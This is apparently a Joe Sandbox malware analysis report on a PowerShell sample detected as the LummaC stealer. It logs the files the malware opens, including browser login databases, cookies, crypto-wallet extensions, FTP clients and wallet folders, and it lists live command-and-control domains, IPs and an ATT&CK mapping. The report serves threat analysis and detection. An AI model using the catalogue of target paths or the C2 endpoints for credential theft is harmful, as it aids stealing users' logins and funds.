Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.db	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Directory queried: C:\Users\user\Documents\TQDFJHPUIU			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Directory queried: C:\Users\user\Documents\TQDFJHPUIU			Jump to behavior

Source: Yara match

File source: Process Memory Space: RegSvcs.exe PID: 6480, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	12 Windows Management Instrumentation	1 DLL Side-Loading	211 Process Injection	121 Virtualization/Sandbox Evasion	2 OS Credential Dumping	121 Security Software Discovery	Remote Services	1 Screen Capture	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	1 DLL Side-Loading	211 Process Injection	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	1 Archive Collected Data	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	11 Deobfuscate/Decode Files or Information	Security Account Manager	121 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	41 Data from Local System	113 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	3 Obfuscated Files or Information	NTDS	1 Application Window Discovery	Distributed Component Object Model	3 Clipboard Data	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	12 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	Steganography	Cached Domain Credentials	22 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
87.247.158.212.ps1	8%	Virustotal		Browse

Source	Detection	Scanner	Label
https://buynostopliik.shop/api~	0%	Avira URL Cloud	safe
https://buynostopliik.shop/g	0%	Avira URL Cloud	safe
https://buynostopliik.shop/apiZW	0%	Avira URL Cloud	safe
https://buynostopliik.shop/_	0%	Avira URL Cloud	safe
https://buynostopliik.shop:443/api.default-release/key4.dbPK	0%	Avira URL Cloud	safe
https://buynostopliik.shop:443/apiK	0%	Avira URL Cloud	safe
https://buynostopliik.shop/apiI	0%	Avira URL Cloud	safe
https://buynostopliik.shop/	0%	Avira URL Cloud	safe
https://buynostopliik.shop:443/api	0%	Avira URL Cloud	safe
https://buynostopliik.shop/api8	0%	Avira URL Cloud	safe
buynostopliik.shop	0%	Avira URL Cloud	safe
https://buynostopliik.shop/api	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
s-part-0017.t-0009.t-msedge.net	13.107.246.45	true	false		high
buynostopliik.shop	104.21.80.1	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
kickykiduz.lat	false		high
bloodyswif.lat	false		high
savorraiykj.lat	false		high
miniatureyu.lat	false		high
washyceehsu.lat	false		high
finickypwk.lat	false		high
shoefeatthe.lat	false		high
leggelatez.lat	false		high
buynostopliik.shop	true	Avira URL Cloud: safe	unknown
https://buynostopliik.shop/api	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000000.00000002.2275070968.000002C181AEA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2293833116.000002C19007F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0	powershell.exe, 00000000.00000002.2275070968.000002C1816B1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000000.00000002.2275070968.000002C181A63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2309337491.000002C1E8D2A000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000000.00000002.2275070968.000002C181A63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2309337491.000002C1E8D2A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://go.micro	powershell.exe, 00000000.00000002.2275070968.000002C1810F7000.00000004.00000800.00020000.00000000.sdmp	false		high
https://buynostopliik.shop/apiI	RegSvcs.exe, 00000003.00000002.2414733395.000000000141A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://buynostopliik.shop:443/api.default-release/key4.dbPK	RegSvcs.exe, 00000003.00000002.2414733395.0000000001403000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/License	powershell.exe, 00000000.00000002.2293833116.000002C19007F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 00000000.00000002.2293833116.000002C19007F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://buynostopliik.shop/api~	RegSvcs.exe, 00000003.00000002.2415764564.000000000147A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://buynostopliik.shop/	RegSvcs.exe, 00000003.00000002.2415764564.0000000001493000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2414733395.000000000143C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://buynostopliik.shop/_	RegSvcs.exe, 00000003.00000002.2414733395.000000000143C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://buynostopliik.shop/api8	RegSvcs.exe, 00000003.00000002.2415764564.0000000001493000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 00000000.00000002.2275070968.000002C181A63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2309337491.000002C1E8D2A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://buynostopliik.shop/apiZW	RegSvcs.exe, 00000003.00000002.2415764564.0000000001493000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://buynostopliik.shop/g	RegSvcs.exe, 00000003.00000002.2414733395.000000000143C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://buynostopliik.shop:443/apiK	RegSvcs.exe, 00000003.00000002.2414733395.0000000001403000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/	powershell.exe, 00000000.00000002.2293833116.000002C19007F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000000.00000002.2275070968.000002C181AEA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2293833116.000002C19007F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://oneget.orgX	powershell.exe, 00000000.00000002.2275070968.000002C1816B1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/pscore68	powershell.exe, 00000000.00000002.2275070968.000002C180001000.00000004.00000800.00020000.00000000.sdmp	false		high
https://buynostopliik.shop:443/api	RegSvcs.exe, 00000003.00000002.2414733395.0000000001403000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000000.00000002.2275070968.000002C180001000.00000004.00000800.00020000.00000000.sdmp	false		high
https://oneget.org	powershell.exe, 00000000.00000002.2275070968.000002C1816B1000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.80.1	buynostopliik.shop	United States		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1591125
Start date and time:	2025-01-14 17:58:11 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 13s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	87.247.158.212.ps1
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winPS1@4/5@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 78% Number of executed functions: 28 Number of non-executed functions: 54
Cookbook Comments:	Found application associated with file extension: .ps1

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 13.107.246.45, 20.12.23.50
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
11:59:19	API Interceptor	8x Sleep call for process: powershell.exe modified
11:59:21	API Interceptor	7x Sleep call for process: RegSvcs.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.80.1	NursultanAlphaCrack.bat.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	237025cm.n9shteam.in/UpdatesqlCdn.php
	QsBdpe1gK5.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.masterqq.pro/vfw3/
	NFhRxwbegd.exe	Get hash	malicious	FormBook	Browse	www.aziziyeescortg.xyz/2pcx/
	qlG7x91YXH.exe	Get hash	malicious	FormBook	Browse	www.mzkd6gp5.top/0hqe/
	6uHfmjGMfL.exe	Get hash	malicious	Amadey	Browse	clientservices.sgoogleapis.observer/api/index.php
	http://l.instagram.com/?0bfd7a413579bfc47b11c1f19890162e=f171d759fb3a033e4eb430517cad3aef&e=ATP3gbWvTZYJbEDeh7rUkhPx4FjctqZcqx8JLHQOt3eCFNBI8ssZ853B2RmMWetLJ63KaZJU&s=1&u=https%3A%2F%2Fbusiness.instagram.com%2Fmicro_site%2Furl%2F%3Fevent_type%3Dclick%26site%3Digb%26destination%3Dhttps%253A%252F%252Fwww.facebook.com%252Fads%252Fig_redirect%252F%253Fd%253DAd8U5WMN2AM7K-NrvRBs3gyfr9DHeZ3ist33ENX9eJBJWMRBAaOOij4rbjtu42P4dXhL8YyD-jl0LZtS1wkFu-DRtZrPI1zyuzAYXXYv3uJfsc2GuuhHJZr0iVcLluY7-XzYStW8tPCtY7q5OaN0ZR5NezqONJHNCe212u1Fk3V5I6c8mMsj53lfF9nQIFCpMtE%2526a%253D1%2526hash%253DAd_y5usHyEC86F8X	Get hash	malicious	Unknown	Browse	my.cradaygo.com/smmylet
	SW_48912.scr.exe	Get hash	malicious	FormBook	Browse	www.dejikenkyu.cyou/pmpa/
	SH8ZyOWNi2.exe	Get hash	malicious	CMSBrute	Browse	hiranetwork.com/administrator/index.php
